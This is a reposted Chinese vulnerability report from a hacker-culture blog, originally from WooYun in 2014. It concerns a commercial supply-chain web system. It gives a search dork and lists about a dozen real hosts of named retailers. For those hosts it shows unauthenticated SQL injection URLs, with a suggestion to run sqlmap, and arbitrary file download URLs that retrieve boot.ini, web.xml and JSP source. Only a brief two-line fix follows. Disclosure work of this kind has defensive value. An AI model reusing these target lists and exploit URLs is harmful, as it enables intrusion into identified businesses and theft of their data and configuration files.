记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

某商业链系统通用SQL注入一枚,外加任意文件下载(无须登录)

2014-09-30 04:35

技术支持:北京富基融通科技有限公司(http://www.e-future.com.cn/)



程序名称:商业供应链系统



漏洞类型:SQL注入 & 任意文件下载



是否需要登录:否



漏洞文件:web/account/dxList.jsp (注入)

web/login/downloadAct.jsp(任意文件下载)



漏洞参数:id grpcode (注入)

FilePath (任意文件下载)



关键字:google & baidu intitle:商业供应链系统



影响用户:

可以参看开发公司的案例介绍: http://www.e-future.com.cn/case_market.php

个人搜集了些案例:

北京奥特莱斯SCM商业供应链系统 

http://123.127.107.117/web/epublic/upload.jsp

哈尔滨联强乐买SCM商业供应链系统

http://1.58.67.114/web/epublic/upload.jsp

北人集团_商业供应链SCM系统-超市

http://scm.brjt.cn:8081/web/epublic/upload.jsp

国光SCM商业供应链系统

http://gyl.jxggls.com:8080/web/epublic/upload.jsp

家乐园供应链系统

http://222.223.124.193:8081/web/epublic/upload.jsp

商业供应链系统

http://js.bjcsf.com/web/epublic/upload.jsp

商业供应链系统

http://218.66.37.70:8081/web/epublic/upload.jsp

商业供应链系统

http://218.207.88.11/web/epublic/upload.jsp

商业供应链系统

http://60.2.37.237:8080/web/epublic/upload.jsp

沈阳新一城商场经营管理有限公司

http://61.161.160.102:8080/web/epublic/upload.jsp

新朝阳购物中心网

http://60.10.134.176:8080/web/epublic/upload.jsp

东方购物广场有限公司SCM系统

http://60.213.49.66:8000/web/epublic/upload.jsp

http://221.194.122.150/web/epublic/upload.jsp



利用方式:

1. SQL注入,直接用工具跑就可以了(Sqlmap)

web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0





2. 任意文件下载:

web/login/downloadAct.jsp?FilePath=c://boot.ini&name=boot.ini

漏洞证明:

实例演示:



<b>一: SQL注入部分:</b>



#####实例1:



http://221.194.122.150/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

1.jpg



1.jpg





####实例2:

东方购物广场有限公司SCM系统

http://60.213.49.66:8000/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

1.jpg



1.jpg





####实例3:

商业供应链系统

http://60.2.37.237:8080/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

1.jpg



1.jpg





####实例4:

http://218.207.88.11/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

1.jpg



1.jpg





####实例5:

http://js.bjcsf.com/web/account/dxList.jsp?id=1&grpcode=0&sstyle1=0

1.jpg



1.jpg





二:任意文件下载漏洞



实例1:

http://218.66.37.70:8081/web/login/downloadAct.jsp?FilePath=D://java//web/WEB-INF//web.xml&name=web.xml

1.jpg





实例2:

http://222.223.124.193:8081/web/login/downloadAct.jsp?FilePath=D://java//web/WEB-INF//web.xml&name=web.xml

1.jpg





实例3:

http://218.66.37.70:8081/web/login/downloadAct.jsp?FilePath=D://java//web/index.jsp&name=index.jsp

1.jpg





实例4:

http://218.207.88.11/web/login/downloadAct.jsp?FilePath=D://java//web/index.jsp&name=index.jsp

1.jpg





实例5:

http://gyl.jxggls.com:8080/web/login/downloadAct.jsp?FilePath=D://java//web/index.jsp&name=index.jsp

1.jpg

修复方案:

1. SQL注入过滤参数



2.任意文件下载: 限制下载文件的目录,加权限访问

知识来源: www.wooyun.org/bugs/wooyun-2014-066881

阅读:581534 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“某商业链系统通用SQL注入一枚,外加任意文件下载(无须登录)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云